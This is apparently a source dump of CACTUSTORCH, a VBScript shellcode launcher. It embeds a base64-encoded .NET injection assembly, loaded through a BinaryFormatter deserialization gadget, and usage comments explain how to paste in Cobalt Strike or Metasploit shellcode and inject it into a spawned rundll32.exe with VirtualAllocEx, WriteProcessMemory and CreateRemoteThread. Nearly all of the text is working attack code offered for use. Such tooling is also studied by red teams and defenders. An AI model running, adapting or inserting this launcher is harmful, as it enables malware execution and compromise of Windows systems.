"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu" 73 | s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA" 74 | s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u" 75 | s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5" 76 | s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR" 77 | s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA" 78 | s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y" 79 | s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh" 80 | s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz" 81 | s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA" 82 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy" 83 | s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA" 84 | s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA" 85 | s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA" 86 | s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 87 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA" 88 | s = s & "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA" 89 | s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA" 90 | s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA" 91 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT" 92 | s = s & "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA" 93 | s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME" 94 | s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR" 95 | s = s & "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA" 96 | s = s & "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR" 97 | s = s & "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V" 98 | s = s & "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA" 99 | s = s & "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu" 100 | s = s & "NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR" 101 | s = s & "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA" 102 | s = s & "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA" 103 | s = s & "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh" 104 | s = s & "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA" 105 | s = s & "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9" 106 | s = s & "AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA" 107 | s = s & "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/" 108 | s = s & "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA" 109 | s = s & "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED" 110 | s = s & "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA" 111 | s = s & "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH" 112 | s = s & "AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA" 113 | s = s & "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/" 114 | s = s & "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG" 115 | s = s & "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS" 116 | s = s & "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA" 117 | s = s & "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA" 118 | s = s & "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH" 119 | s = s & "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD" 120 | s = s & "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I" 121 | s = s & "AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF" 122 | s = s & "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA" 123 | s = s & "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+" 124 | s = s & "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA" 125 | s = s & "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE" 126 | s = s & "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A" 127 | s = s & "CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ" 128 | s = s & "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA" 129 | s = s & "CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw" 130 | s = s & "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB" 131 | s = s & "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz" 132 | s = s & "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA" 133 | s = s & "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA" 134 | s = s & "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy" 135 | s = s & "AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP" 136 | s = s & "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V" 137 | s = s & "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD" 138 | s = s & "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV" 139 | s = s & "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW" 140 | s = s & "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf" 141 | s = s & "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf" 142 | s = s & "TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT" 143 | s = s & "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM" 144 | s = s & "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X" 145 | s = s & "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU" 146 | s = s & "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV" 147 | s = s & "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG" 148 | s = s & "QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT" 149 | s = s & "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS" 150 | s = s & "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi" 151 | s = s & "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU" 152 | s = s & "aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl" 153 | s = s & "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA" 154 | s = s & "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl" 155 | s = s & "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli" 156 | s = s & "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp" 157 | s = s & "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs" 158 | s = s & "eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv" 159 | s = s & "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0" 160 | s = s & "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp" 161 | s = s & "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp" 162 | s = s & "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG" 163 | s = s & "cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr" 164 | s = s & "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy" 165 | s = s & "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj" 166 | s = s & "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk" 167 | s = s & "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj" 168 | s = s & "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT" 169 | s = s & "ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz" 170 | s = s & "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD" 171 | s = s & "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA" 172 | s = s & "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB" 173 | s = s & "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj" 174 | s = s & "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0" 175 | s = s & "AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl" 176 | s = s & "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0" 177 | s = s & "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP" 178 | s = s & "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB" 179 | s = s & "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O" 180 | s = s & "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA" 181 | s = s & "AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA" 182 | s = s & "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA" 183 | s = s & "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC" 184 | s = s & "ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY" 185 | s = s & "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB" 186 | s = s & "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm" 187 | s = s & "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA" 188 | s = s & "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg" 189 | s = s & "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA" 190 | s = s & "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A" 191 | s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA" 192 | s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA" 193 | s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs" 194 | s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA" 195 | s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA" 196 | s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA" 197 | s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu" 198 | s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA" 199 | s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV" 200 | s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA" 201 | s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP" 202 | s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA" 203 | s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw" 204 | s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA" 205 | s = s & "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 206 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 207 | s = s & "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 208 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 209 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 210 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 211 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 212 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 213 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 214 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 215 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 216 | s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv" 217 | s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA" 218 | entry_class = "cactusTorch" 219 | 220 | Dim fmt, al, d, o 221 | Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter") 222 | Set al = CreateObject("System.Collections.ArrayList") 223 | al.Add fmt.SurrogateSelector 224 | 225 | Set d = fmt.Deserialize_2(Base64ToStream(s)) 226 | Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class) 227 | o.flame binary,code 228 | End Sub 229 | 230 | SetVersion 231 | On Error Resume Next 232 | Run 233 | If Err.Number <> 0 Then 234 | Debug Err.Description 235 | Err.Clear 236 | End If -------------------------------------------------------------------------------- /CACTUSTORCH.vbs: -------------------------------------------------------------------------------- 1 | ' ( ) ( ) 2 | ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 3 | ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 4 | ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 5 | ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 6 | '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 7 | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 8 | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 9 | ' 10 | ' Author: Vincent Yiu (@vysecurity) 11 | ' Credits: 12 | ' - @cn33liz: Inspiration with StarFighter 13 | ' - @ttiraniddo: James Forshaw for DotNet2JScript 14 | ' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 15 | 16 | ' A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 17 | 18 | ' Usage: 19 | ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 20 | ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 21 | ' Run: cat payload.bin | base64 -w 0 22 | ' Copy the base64 encoded payload into the code variable below. 23 | 24 | ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32 25 | Dim binary : binary = "rundll32.exe" 26 | 27 | ' Base64 encoded 32 bit shellcode 28 | Dim code : code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA" 29 | 30 | ' ---------- DO NOT EDIT BELOW HERE ----------- 31 | 32 | Sub Debug(s) 33 | End Sub 34 | Sub SetVersion 35 | Dim shell 36 | Set shell = CreateObject("WScript.Shell") 37 | Dim ver 38 | ver = "v4.0.30319" 39 | On Error Resume Next 40 | shell.RegRead "HKLM\SOFTWARE\\Microsoft\.NETFramework\v4.0.30319\" 41 | If Err.Number <> 0 Then 42 | ver = "v2.0.50727" 43 | Err.Clear 44 | End If 45 | shell.Environment("Process").Item("COMPLUS_Version") = ver 46 | End Sub 47 | Function Base64ToStream(b) 48 | Dim enc, length, ba, transform, ms 49 | Set enc = CreateObject("System.Text.ASCIIEncoding") 50 | length = enc.GetByteCount_2(b) 51 | Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform") 52 | Set ms = CreateObject("System.IO.MemoryStream") 53 | ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 54 | ms.Position = 0 55 | Set Base64ToStream = ms 56 | End Function 57 | 58 | Sub Run 59 | Dim s, entry_class 60 | s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy" 61 | s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph" 62 | s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk" 63 | s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD" 64 | s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl" 65 | s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU" 66 | s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl" 67 | s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90" 68 | s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu" 69 | s = s & 